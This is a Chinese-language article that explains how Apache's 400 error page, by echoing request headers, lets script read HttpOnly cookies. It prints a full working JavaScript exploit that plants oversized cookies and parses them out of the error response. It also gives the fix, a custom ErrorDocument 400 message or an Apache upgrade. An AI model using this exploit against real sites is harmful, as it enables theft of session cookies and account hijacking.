很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而本文讨论的Apache 400错误页回显请求头的问题刚好可以用来绕过cookie的这个httponly的属性。
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
  // Plants (good falsy/absent) or expires (good truthy) ten cookies named
  // xss0..xss9 on path=/. With good falsy each value is an 819-character run
  // of "x", so the browser's Cookie header on the next same-origin request
  // grows by roughly 10 x 819 bytes; the listing relies on an affected server
  // answering such a request with a 400 whose body echoes the offending header
  // (see makeRequest and the text below the listing).
  // good: when truthy, overwrite each xss<i> cookie with an expiry in the past
  //       so the browser drops it; when falsy, plant the oversized cookies.
  // Returns nothing; its only effect is writes to document.cookie.
  // Construct string for cookie value
  var str = "";
  for (var i=0; i< 819; i++) {
    str += "x";
  }
  // Set cookies
  for (i = 0; i < 10; i++) {
    // Expire evil cookie
    if (good) {
      // expires = one millisecond before "now", i.e. already expired
      var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
    }
    // Set evil cookie
    else {
      var cookie = "xss"+i+"="+str+";path=/";
    }
    document.cookie = cookie;
  }
}
function makeRequest() {
  // Drives the disclosure: plants the oversized cookies, then issues an XHR to
  // "/" on the current origin so the browser attaches every cookie for that
  // path -- including HttpOnly ones, which script cannot read from
  // document.cookie but which the browser still sends. parseCookies then reads
  // them back out of the 400 response body.
  // Defender's takeaway: HttpOnly protects the cookie jar, not a response body
  // that echoes the request. The remedy described below the listing is a custom
  // ErrorDocument 400 (no <pre> echo, so nothing is disclosed) or a patched
  // server. On the wire this shows up as 400 responses to requests carrying an
  // unusually large Cookie header with names xss0..xss9.
  setCookies();
  // readystatechange handler for xhr, which is declared further down; function
  // declarations are hoisted and xhr is only read when the handler fires.
  function parseCookies () {
    var cookie_dict = {};
    // Only react on 400 status
    if (xhr.readyState === 4 && xhr.status === 400) {
      // Replace newlines and match <pre> content
      // Expects the error body to carry the rejected request header inside
      // <pre>...</pre>, beginning with "Cookie: ".
      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      if (content.length) {
        // Remove Cookie: prefix
        content = content[1].replace("Cookie: ", "");
        // Drop the planted xss<digit> padding cookies; keep every other cookie
        var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
        // Add cookies to object
        for (var i=0; i<cookies.length; i++) {
          var s_c = cookies.split('=',2);
          cookie_dict[s_c[0]] = s_c[1];
        }
      }
      // Unset malicious cookies
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    }
  }
  // Make XHR request
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  // same-origin, asynchronous GET of the site root
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: runs the whole sequence immediately when the listing is pasted
// into the DevTools console of a page on the site being tested.
makeRequest();
你就能看见华丽丽的400错误包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,升级apache到最新版本也可:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html